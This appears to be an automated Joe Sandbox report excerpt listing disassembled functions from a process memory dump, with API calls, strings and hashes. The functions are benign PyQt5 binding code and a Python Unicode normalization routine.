Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Clear$Data@@Iter_ListNext$?append@?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QTextBlock' is expected
API String ID: 1641402220-839721124
Opcode ID: ba1acb8aaf593b16b5cc15bb2411bf907973fb57eab5671183d9afe9ded825d0
Instruction ID: c1b895d22ea809c65a2d7fc596e54d798225a2fcd0c2909ea5fc8edcf46a1849
Opcode Fuzzy Hash: ba1acb8aaf593b16b5cc15bb2411bf907973fb57eab5671183d9afe9ded825d0
Instruction Fuzzy Hash: A7C18E32B09A5286EAA4DF15E4682BD77A0FB85BB4F488135DE5E57790DF3CE841C300

Function 00007FFD8627CD80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD8627CD9D
PyErr_Clear.PYTHON3 ref: 00007FFD8627CDAB
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CDBF
PyType_GetFlags.PYTHON3 ref: 00007FFD8627CDC9
PyErr_Clear.PYTHON3 ref: 00007FFD8627CE33
PyIter_Next.PYTHON3 ref: 00007FFD8627CE3C
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CE99
PyErr_Clear.PYTHON3 ref: 00007FFD8627CEA2
PyIter_Next.PYTHON3 ref: 00007FFD8627CEAB
PyErr_Occurred.PYTHON3 ref: 00007FFD8627CEB9
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8627CEE7
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CF03
PyErr_Format.PYTHON3 ref: 00007FFD8627CF56
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CF65
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8627CF8A
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CFAA
_Py_Dealloc.PYTHON3 ref: 00007FFD8627CFBE

Strings

index %zd has type '%s' but 'QStandardItem' is expected, xrefs: 00007FFD8627CF46

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Clear$?dispose@Data@1@@Data@@Iter_ListNext$FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QStandardItem' is expected
API String ID: 2942702457-2631087871
Opcode ID: 63a5658965f1272d08f3b8be0eaaabcbc0bcc8256ce570f052945b30031a97e5
Instruction ID: 88a3051a0f8f3521b298e9b0466864ad507f312952fc17374676908869736cf1
Opcode Fuzzy Hash: 63a5658965f1272d08f3b8be0eaaabcbc0bcc8256ce570f052945b30031a97e5
Instruction Fuzzy Hash: 33613C72B08A4686EA55AF36E82967D73A0BF85BB4F184471DE5E53790EF3CE845C300

Function 00007FFD8627A1E0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD8627A200
PyErr_Clear.PYTHON3 ref: 00007FFD8627A20E
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A222
PyType_GetFlags.PYTHON3 ref: 00007FFD8627A22C
?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFD8627A286
PyErr_Clear.PYTHON3 ref: 00007FFD8627A291
PyIter_Next.PYTHON3 ref: 00007FFD8627A29A
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A31D
PyErr_Clear.PYTHON3 ref: 00007FFD8627A326
PyIter_Next.PYTHON3 ref: 00007FFD8627A32F
PyErr_Occurred.PYTHON3 ref: 00007FFD8627A346
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A391
PyErr_Format.PYTHON3 ref: 00007FFD8627A3DA
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A3E8
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A42E
_Py_Dealloc.PYTHON3 ref: 00007FFD8627A441

Strings

index %zd has type '%s' but 'QTextFormat' is expected, xrefs: 00007FFD8627A3CA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Clear$Iter_Next$?sharedArrayData@@FlagsFormatIterNull@Object_OccurredType_
String ID: index %zd has type '%s' but 'QTextFormat' is expected
API String ID: 2049041316-3360643145
Opcode ID: 94d1c34d55763e63b975ae6a08672c5a9e535f077afc63b52e635840e50f29a2
Instruction ID: c32ca7eac4bed33f1a3a3ad63aa00d0850ffbe738f4ac5c5ef618822f2135cf1
Opcode Fuzzy Hash: 94d1c34d55763e63b975ae6a08672c5a9e535f077afc63b52e635840e50f29a2
Instruction Fuzzy Hash: 09616562B0964286EA51AF26E8296BD73A0BF55FB5F0844B1DE5E53790DF3CEC46C300

Function 00007FFD86288D00 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD86288D20
PyErr_Clear.PYTHON3 ref: 00007FFD86288D2E
_Py_Dealloc.PYTHON3 ref: 00007FFD86288D42
PyType_GetFlags.PYTHON3 ref: 00007FFD86288D4C
PyErr_Clear.PYTHON3 ref: 00007FFD86288DB2
PyIter_Next.PYTHON3 ref: 00007FFD86288DBB
_Py_Dealloc.PYTHON3 ref: 00007FFD86288E3D
PyErr_Clear.PYTHON3 ref: 00007FFD86288E46
PyIter_Next.PYTHON3 ref: 00007FFD86288E4F
PyErr_Occurred.PYTHON3 ref: 00007FFD86288E66
_Py_Dealloc.PYTHON3 ref: 00007FFD86288EB1
PyErr_Format.PYTHON3 ref: 00007FFD86288EFA
_Py_Dealloc.PYTHON3 ref: 00007FFD86288F08
_Py_Dealloc.PYTHON3 ref: 00007FFD86288F4E
_Py_Dealloc.PYTHON3 ref: 00007FFD86288F61

Strings

index %zd has type '%s' but 'QPolygonF' is expected, xrefs: 00007FFD86288EEA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Clear$Iter_Next$FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QPolygonF' is expected
API String ID: 113872921-732960161
Opcode ID: f262d62a7b7f9ec3ce9c44f4c7f5fa615c60f2dc71f2798f5a36e5484cf7deba
Instruction ID: 7971cd1609298cc2de13b9bfd48e8df13fbb549da39f54bb4bd9e2013cab5e1f
Opcode Fuzzy Hash: f262d62a7b7f9ec3ce9c44f4c7f5fa615c60f2dc71f2798f5a36e5484cf7deba
Instruction Fuzzy Hash: 61614E22B09A4282EA51AF26EC2927D73A0BF55FB4F084471DE5E57790EF3CE856C300

Function 00007FFD86266AD0 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

??0QPen@@QEAA@XZ.QT5GUI ref: 00007FFD86266B2C
??0QPen@@QEAA@W4PenStyle@Qt@@@Z.QT5GUI ref: 00007FFD86266B8A

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

J1d|EEE, xrefs: 00007FFD86266C1A
@J1, xrefs: 00007FFD86266D4E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Pen@@$Qt@@@Style@malloc
String ID: @J1$J1d|EEE
API String ID: 1851768539-4023318197
Opcode ID: 081052bbd40cc8891560a950073337f0885c3e1a3d0ba8af1677a8e7d0c84009
Instruction ID: efa2f00a09c14754276260c6fec2940a67ac935dc8d603ce11ea4d68c991a2cb
Opcode Fuzzy Hash: 081052bbd40cc8891560a950073337f0885c3e1a3d0ba8af1677a8e7d0c84009
Instruction Fuzzy Hash: 8BB13A76709B818AEB509F25E8A46AD77A4FB88BA4F144135EE4E07B68DF3CD914C700

Function 00007FFD8625AF60 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 121threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFD8625AFF9
?save@QPicture@@QEAA_NPEAVQIODevice@@PEBD@Z.QT5GUI ref: 00007FFD8625B00E
PyEval_RestoreThread.PYTHON3 ref: 00007FFD8625B01A
_Py_Dealloc.PYTHON3 ref: 00007FFD8625B02F
PyBool_FromLong.PYTHON3 ref: 00007FFD8625B037
PyEval_SaveThread.PYTHON3 ref: 00007FFD8625B0CE
?save@QPicture@@QEAA_NAEBVQString@@PEBD@Z.QT5GUI ref: 00007FFD8625B0E3
PyEval_RestoreThread.PYTHON3 ref: 00007FFD8625B0EF
_Py_Dealloc.PYTHON3 ref: 00007FFD8625B121
PyBool_FromLong.PYTHON3 ref: 00007FFD8625B129

Strings

BJ1|AA, xrefs: 00007FFD8625B0AC
QPicture, xrefs: 00007FFD8625B14A
BJ8|AA, xrefs: 00007FFD8625AFD3
save, xrefs: 00007FFD8625B143
save(self, dev: Optional[QIODevice], format: Optional[str] = None) -> boolsave(self, fileName: Optional[str], format: Optional[str] = None) -> bool, xrefs: 00007FFD8625B138

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Eval_Thread$?save@Bool_DeallocFromLongPicture@@RestoreSave$Device@@String@@
String ID: BJ1|AA$BJ8|AA$QPicture$save$save(self, dev: Optional[QIODevice], format: Optional[str] = None) -> boolsave(self, fileName: Optional[str], format: Optional[str] = None) -> bool
API String ID: 599976370-1502787042
Opcode ID: e8bb7a026d0193c5f5ee4003eb8fc249f286df98ccedb28cc05aff57788d5485
Instruction ID: 2134545cc1531b5adf3e380326b6a46a378db386e42c957eeb644f4b50d29594
Opcode Fuzzy Hash: e8bb7a026d0193c5f5ee4003eb8fc249f286df98ccedb28cc05aff57788d5485
Instruction Fuzzy Hash: 8A51EA3670AF41C9EB509F25E8A42ED73A8FB48B98F550136EA4D43B64EF38D955C700

Function 00007FFD8629EDE0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

??0QTextFormat@@QEAA@XZ.QT5GUI ref: 00007FFD8629EE3E
??0QTextFormat@@QEAA@H@Z.QT5GUI ref: 00007FFD8629EE92

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

@J1, xrefs: 00007FFD8629EF42

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Format@@Text$malloc
String ID: @J1
API String ID: 2950867646-3566465895
Opcode ID: e9818ca4f5369d5f4dc86f7f2982fba87b0a7f4cbaeab8e9c203f12ae3d5ba49
Instruction ID: b3ea4143b5581e6176c6e920d5e91d8b8e21dc08c08d69f75cc22ba8d1285245
Opcode Fuzzy Hash: e9818ca4f5369d5f4dc86f7f2982fba87b0a7f4cbaeab8e9c203f12ae3d5ba49
Instruction Fuzzy Hash: 5571F971B0CB4686EB509B55F8646BAB7A5FB98BA0F040075DA8E43B68DF3CE845C700

Function 00007FFD86254D60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

?qstrcmp@@YAHPEBD0@Z.QT5CORE ref: 00007FFD86254E17
?qstrdup@@YAPEADPEBD@Z.QT5CORE ref: 00007FFD86254E3B
_Py_Dealloc.PYTHON3 ref: 00007FFD86254E6D
_Py_Dealloc.PYTHON3 ref: 00007FFD86254E92
?defineIOHandler@QPictureIO@@SAXPEBD00P6AXPEAV1@@Z2@Z.QT5GUI ref: 00007FFD86254ECF
_Py_Dealloc.PYTHON3 ref: 00007FFD86254EDF
_Py_Dealloc.PYTHON3 ref: 00007FFD86254EEF
_Py_Dealloc.PYTHON3 ref: 00007FFD86254EFF

Strings

AAAAAAHH, xrefs: 00007FFD86254D8D
defineIOHandler, xrefs: 00007FFD86254F39
QPictureIO, xrefs: 00007FFD86254F40
defineIOHandler(format: Optional[str], header: Optional[str], flags: Optional[str], read_picture: Optional[Callable[[QPictureIO], None]], write_picture: Optional[Callable[[QPictureIO], None]]), xrefs: 00007FFD86254F2E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$?define?qstrcmp@@?qstrdup@@Handler@PictureV1@@
String ID: AAAAAAHH$QPictureIO$defineIOHandler$defineIOHandler(format: Optional[str], header: Optional[str], flags: Optional[str], read_picture: Optional[Callable[[QPictureIO], None]], write_picture: Optional[Callable[[QPictureIO], None]])
API String ID: 659459723-743610374
Opcode ID: a7e2b267cab5cff2008b2e9ada190b51f5ff88191853d7a3b572a92f2be706b2
Instruction ID: a1a55f531ad6f0d974245c29dc3a440f79eabdd06b17aac3bd2e25ff9084370b
Opcode Fuzzy Hash: a7e2b267cab5cff2008b2e9ada190b51f5ff88191853d7a3b572a92f2be706b2
Instruction Fuzzy Hash: 3E51EB36B09F46C8EB60DF25E8582AC73A8FB54B68F484536DA4D03B64EF39E855C310

Function 00007FFD875911C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FFD875911F2
PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FFD8759120A
PyType_IsSubtype.PYTHON313 ref: 00007FFD8759122D

Part of subcall function 00007FFD87591300: PyMem_Malloc.PYTHON313 ref: 00007FFD8759138B

PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FFD87593995

Strings

NFKD, xrefs: 00007FFD875939D1
NFC, xrefs: 00007FFD875911E8
NFKC, xrefs: 00007FFD87591200
invalid normalization form, xrefs: 00007FFD87593A2D
NFD, xrefs: 00007FFD8759398B

Memory Dump Source

Source File: 0000000F.00000002.2691104187.00007FFD87591000.00000020.00000001.01000000.00000040.sdmp, Offset: 00007FFD87590000, based on PE: true

Associated: 0000000F.00000002.2691050427.00007FFD87590000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87596000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875DA000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875E8000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87637000.00000002.00000001.01000000.00000040.sdmpDownload File
